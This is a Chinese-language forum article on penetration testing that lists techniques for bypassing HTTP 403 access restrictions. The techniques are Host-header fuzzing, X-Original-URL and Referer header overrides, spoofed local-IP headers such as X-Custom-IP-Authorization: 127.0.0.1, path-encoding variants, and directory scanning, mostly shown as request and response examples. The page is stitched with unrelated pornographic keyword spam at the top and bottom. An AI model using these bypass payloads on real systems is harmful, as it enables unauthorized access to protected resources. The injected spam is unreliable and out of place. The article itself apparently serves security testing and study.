色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

滲透測試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀

0x01 前言




做滲透時(shí)經(jīng)常會(huì)碰到掃到的資產(chǎn)403的情況,特別是資產(chǎn)微乎其微的情況下,面試有時(shí)也會(huì)問到,這里做個(gè)總結(jié)!

0x02 利用姿勢




1.端口利用

掃描主機(jī)端口,找其它開放web服務(wù)的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請求頭中的作用:在一般情況下,幾個(gè)網(wǎng)站可能會(huì)部署在同一個(gè)服務(wù)器上,或者幾個(gè)web系統(tǒng)共享一個(gè)服務(wù)器,通過host頭來指定應(yīng)該由哪個(gè)網(wǎng)站或者web系統(tǒng)來處理用戶的請求。而很多WEB應(yīng)用通過獲取HTTP HOST頭來獲得當(dāng)前請求訪問的位置,但是很多開發(fā)人員并未意識(shí)到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認(rèn)為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進(jìn)行繞過二級(jí)域名;首先對該目標(biāo)域名進(jìn)行子域名收集,整理好子域名資產(chǎn)(host字段同樣支持IP地址)。先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個(gè)服務(wù)端返回200的狀態(tài)碼,即表面成功找到一個(gè)在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URLX-Rewrite-URL標(biāo)頭繞過Web服務(wù)器的限制。通過支持X-Original-URLX-Rewrite-URL標(biāo)頭,用戶可以使用這倆請求標(biāo)頭覆蓋請求URL中的路徑,嘗試?yán)@過對更高級(jí)別的緩存和Web服務(wù)器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標(biāo)頭繞過

嘗試使用Referer標(biāo)頭繞過Web服務(wù)器的限制。

介紹:Referer請求頭包含了當(dāng)前請求頁面的來源頁面的地址,即表示當(dāng)前頁面是通過此來源頁面里的鏈接進(jìn)入的。服務(wù)端一般使用Referer請求頭識(shí)別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發(fā)者會(huì)通過Nginx代理識(shí)別訪問端IP限制對接口的訪問,嘗試使用X-Forwarded-ForX-Forwared-Host等標(biāo)頭繞過Web服務(wù)器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴(kuò)展名繞過

基于擴(kuò)展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時(shí)候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時(shí)候要打開探測403,因?yàn)橛行┚W(wǎng)站的目錄沒有權(quán)限訪問會(huì)顯示403,但是在這個(gè)目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9237

    瀏覽量

    85664
  • URL
    URL
    +關(guān)注

    關(guān)注

    0

    文章

    139

    瀏覽量

    15376
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    20

    瀏覽量

    6291

原文標(biāo)題:滲透測試如何利用403頁面

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    HarmonyOS Web頁面加載的原理和優(yōu)化方法

    在移動(dòng)互聯(lián)網(wǎng)時(shí)代,應(yīng)用的頁面渲染速度對于用戶體驗(yàn)至關(guān)重要。相對于原生頁面,Web頁面的性能存在多方面的技術(shù)挑戰(zhàn)。本文以HarmonyOS的ArkWeb組件為基礎(chǔ),介紹了Web頁面加載中
    的頭像 發(fā)表于 12-05 15:14 ?266次閱讀
    HarmonyOS Web<b class='flag-5'>頁面</b>加載的原理和優(yōu)化方法

    什么是滲透作用_金屬封裝又是如何發(fā)生滲透

    ? 滲透作用使得芯片封裝中沒有絕對的氣密性封裝,那么什么是滲透作用?金屬封裝又是如何發(fā)生滲透的呢??? 滲透:氣體從密度大的一側(cè)向密度小的一側(cè)滲入、擴(kuò)散、通過、和逸出固體阻擋層的過程。
    的頭像 發(fā)表于 11-22 10:27 ?318次閱讀

    TLV320ADC3101可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,為什么?

    如題,通過csl庫提供的程序,可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,很奇怪,數(shù)據(jù)手冊好像也沒有說讀取PAGE4與讀取其他頁面上的寄存器有什么不同,不知道有沒有誰遇到同樣問題,在線等!!!
    發(fā)表于 10-30 08:02

    TFP501、TFP403參考設(shè)計(jì)

    電子發(fā)燒友網(wǎng)站提供《TFP501、TFP403參考設(shè)計(jì).pdf》資料免費(fèi)下載
    發(fā)表于 09-29 09:53 ?0次下載
    TFP501、TFP<b class='flag-5'>403</b>參考設(shè)計(jì)

    Linux內(nèi)核中的頁面分配機(jī)制

    Linux內(nèi)核中是如何分配出頁面的,如果我們站在CPU的角度去看這個(gè)問題,CPU能分配出來的頁面是以物理頁面為單位的。也就是我們計(jì)算機(jī)中常講的分頁機(jī)制。本文就看下Linux內(nèi)核是如何管理,釋放和分配這些物理
    的頭像 發(fā)表于 08-07 15:51 ?312次閱讀
    Linux內(nèi)核中的<b class='flag-5'>頁面</b>分配機(jī)制

    TFP403數(shù)字接收器數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《TFP403數(shù)字接收器數(shù)據(jù)表.pdf》資料免費(fèi)下載
    發(fā)表于 06-29 09:33 ?0次下載
    TFP<b class='flag-5'>403</b>數(shù)字接收器數(shù)據(jù)表

    全自動(dòng)絕緣油耐壓測試儀的操作步驟——每日了解電力知識(shí)

    ) 2.在圖1頁面下,按 設(shè)置 鍵進(jìn)入下一級(jí)頁面(圖2); 3.在圖2頁面下,按 選擇 鍵移動(dòng)光標(biāo)√ 至 GB1986處,按 確認(rèn) 鍵即可進(jìn)入國標(biāo)1986設(shè)置子頁面(圖3)。 在圖3
    的頭像 發(fā)表于 06-17 10:23 ?591次閱讀
    全自動(dòng)絕緣油耐壓<b class='flag-5'>測試</b>儀的操作步驟——每日了解電力知識(shí)

    鴻蒙開發(fā):【頁面棧及任務(wù)鏈】

    單個(gè)UIAbility組件可以實(shí)現(xiàn)多個(gè)頁面,并在多個(gè)頁面之間跳轉(zhuǎn),這種UIAbility組件內(nèi)部的頁面跳轉(zhuǎn)關(guān)系稱為“頁面棧”,由ArkUI框架統(tǒng)一管理,如下圖中的UIAbility1
    的頭像 發(fā)表于 06-14 10:10 ?441次閱讀
    鴻蒙開發(fā):【<b class='flag-5'>頁面</b>棧及任務(wù)鏈】

    鴻蒙OS開發(fā):典型頁面場景【一次開發(fā),多端部署】實(shí)戰(zhàn)(音樂專輯

    本小節(jié)將以音樂專輯為例,介紹如何使用自適應(yīng)布局能力和響應(yīng)式布局能力適配不同尺寸窗口。
    的頭像 發(fā)表于 05-24 20:33 ?647次閱讀
    鴻蒙OS開發(fā):典型<b class='flag-5'>頁面</b>場景【一次開發(fā),多端部署】實(shí)戰(zhàn)(音樂專輯<b class='flag-5'>頁</b>)

    STM32F103利用I2C讀寫EEPROM時(shí),利用寫入時(shí),讀回的數(shù)據(jù)和寫入的數(shù)據(jù)不一致,為什么?

    在STM32F103芯片中,利用I2C讀寫EEPROM時(shí),單字節(jié)寫入,讀回的數(shù)據(jù)和寫入的一致;但是當(dāng)利用寫入時(shí),讀回的數(shù)據(jù)和寫入的數(shù)據(jù)不一致,這是什么原因?qū)е碌模?/div>
    發(fā)表于 03-20 07:01

    touchgfx4.20.0頁面層數(shù)比較多容易出現(xiàn)卡死現(xiàn)象怎么解決?

    頁面層數(shù)比較多,添加了表格等控件,當(dāng)點(diǎn)擊最上層頁面的時(shí)候,很容易出現(xiàn)卡死現(xiàn)象,通過stm32ide調(diào)試,找不到死機(jī)的地方,既不是進(jìn)入死循環(huán),也沒進(jìn)入硬件fault中斷,像是ui任務(wù)死機(jī)了;請問這個(gè)怎么查找解決?
    發(fā)表于 03-08 08:01

    LABVIEW WEB發(fā)布,H5頁面,可讀寫VI數(shù)據(jù)

    賬號(hào): a12345 密碼: 12345678 普通用戶 賬號(hào): b12345 密碼: 12345678 只有普通用戶可以登錄手機(jī)頁面
    發(fā)表于 02-25 00:29

    鴻蒙頁面示例

    @Component 標(biāo)簽修飾UI,相當(dāng)于Android的view,所有的UI組件都要使用@Component標(biāo)簽 @Entry標(biāo)簽 表明當(dāng)前是一個(gè)頁面,不是一個(gè)視圖。多個(gè)組件組合時(shí)只能有一個(gè)
    的頭像 發(fā)表于 02-01 11:24 ?474次閱讀

    AT32F403A系列 數(shù)據(jù)手冊

    電子發(fā)燒友網(wǎng)站提供《AT32F403A系列 數(shù)據(jù)手冊.pdf》資料免費(fèi)下載
    發(fā)表于 01-22 10:06 ?7次下載

    介紹一款基于java的滲透測試神器-CobaltStrike

    Cobalt Strike是一款基于java的滲透測試神器,常被業(yè)界人稱為CS神器。
    的頭像 發(fā)表于 01-16 09:16 ?1018次閱讀
    介紹一款基于java的<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>神器-CobaltStrike
    主站蜘蛛池模板: 午夜福利免费0948视频| 亚洲精品视频免费观看| 18黄女脱内衣| 暖暖日本 在线 高清| 百性阁综合社区| 手机免费毛片| 国语自产拍大学生在线观看| 樱桃BT在线观看| 青柠在线视频| 国产无遮挡无码视频在线观看不卡 | 亚洲欧洲日本无在线码播放| 老头狠狠挺进小莹体内视频| z0000性欧美| 亚洲合集综合久久性色| 刘梓晨啪啪啪| 国产精品久久久久久亚洲影视| 岳扒开让我添| 色AV色婷婷66人妻久久久| 国语自产一区第二页| 3d无遮挡h肉动漫在线播放| 日韩av片无码一区二区不卡电影| 国产视频这里只有精品| 99久久久精品| 亚欧成人毛片一区二区三区四区| 久久有码中文字幕| 儿子操妈妈| 中文字幕完整高清版| 十九岁韩国电影在线观看| 久久综合久久鬼色| 国产美女裸身网站免费观看视频| 2017最新伦理伦理片67| 贤妻良母电影日本| 欧美黑人巨大xxxxx| 极品美女穴| 广东95后小情侣酒店自拍流出| 诱受H嗯啊巨肉舍友1V1| 无码一区国产欧美在线资源| 免费看的一级毛片| 久久超碰色中文字幕| 国产精品av| 99热国产这里只有精品6|